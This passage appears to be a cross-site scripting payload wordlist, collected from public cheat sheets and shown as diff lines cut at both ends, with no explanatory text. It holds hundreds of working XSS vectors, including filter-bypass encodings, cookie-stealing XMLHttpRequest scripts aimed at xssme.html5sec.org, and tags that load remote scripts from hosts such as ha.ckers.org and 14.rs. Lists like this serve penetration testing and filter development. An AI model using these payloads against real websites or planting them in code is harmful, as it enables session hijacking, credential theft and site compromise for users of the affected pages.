autofocus> +<xss id=x tabindex=1 onfocus=alert(1)></xss> +<xss id=x tabindex=1 onfocusin=alert(1)></xss> +<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus> +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> +<SCRIPT>alert('XSS');</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> +<IMG SRC="javascript:alert('XSS')" +<SCRIPT>a=/XSS/ +\";alert('XSS');// +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="mocha:[code]"> +<IMG SRC="livescript:[code]"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<XSS STYLE='no\xss:noxss("*//*"); +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +getURL("javascript:alert('XSS')") +a="get"; +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<HTML><BODY> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)'; +<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<svg%0Aonload=%09((pro\u006dpt))()// +<sCriPt x>(((confirm)))``</scRipt x> +<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z +<deTAiLs/open/oNtoGGle=confirm()> +<scRiPt y="><">/*<sCRipt* */prompt()</script +<A href="javascript%26colon;confirm()">click +<sVg oNloaD=write()> +<A href=javas%26#99;ript:alert(1)>click +<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> +<svG/x=">"/oNloaD=confirm()// +<--`<iMG/srC=` onerror=confirm``> --!> +<SVg </onlOad ="1> (_=prompt,_(1)) ""> +<!--><scRipT src=//14.rs> +<sCriPt/src=//14.rs? +<sCRIpt x=">" src=//15.rs></script> +<D3/OnMouSEenTer=[2].find(confirm)>z +<D3"<"/OncLick="1>[confirm``]"<">z +<D3/OnpOinTeReENter=confirm``>click here +<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> +<Z oncut=alert()>x +<iFrAMe/src \/\/onload = prompt(1) +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +>>> vectors() +<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div 